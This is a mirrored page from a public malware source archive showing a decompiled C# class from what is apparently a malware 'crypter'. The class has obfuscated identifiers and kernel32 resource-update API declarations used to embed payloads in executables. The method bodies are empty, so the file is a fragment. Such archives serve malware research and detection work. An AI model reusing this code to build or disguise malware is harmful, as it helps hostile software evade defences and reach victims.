mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-19 09:56:10 +00:00
42 lines
1.5 KiB
C#
42 lines
1.5 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: ऄ࠹.ऄࡆ
|
|||
|
// Assembly: L3G!T™ Public Crypter 1.0, Version=1.0.0.1, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: FCDEF2F2-8E7E-4528-B12E-ED99013B2DCE
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Virus.Win32.Virut.ce-d1c1a097ee65bcbdb837a528eb91652ea74c5b5ac7d41670ff2946e6d8dd6d9f.exe
|
|||
|
|
|||
|
using Microsoft.VisualBasic.CompilerServices;
|
|||
|
using System;
|
|||
|
using System.Runtime.CompilerServices;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
|
|||
|
namespace ऄ\u0839
|
|||
|
{
|
|||
|
[StandardModule]
|
|||
|
internal sealed class ऄࡆ
|
|||
|
{
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static IntPtr ऄࡀ(object _param0);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "UpdateResource", SetLastError = true)]
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static extern bool ऄࡀ(
|
|||
|
IntPtr _param0,
|
|||
|
string _param1,
|
|||
|
string _param2,
|
|||
|
ushort _param3,
|
|||
|
IntPtr _param4,
|
|||
|
uint _param5);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "BeginUpdateResource", SetLastError = true)]
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static extern IntPtr ऄࡀ(string _param0, [MarshalAs(UnmanagedType.Bool)] bool _param1);
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "EndUpdateResource", SetLastError = true)]
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
private static extern bool ऄࡀ(IntPtr _param0, bool _param1);
|
|||
|
|
|||
|
[MethodImpl(MethodImplOptions.NoInlining)]
|
|||
|
public static bool ऄࡀ(string _param0, byte[] _param1, int _param2);
|
|||
|
}
|
|||
|
}
|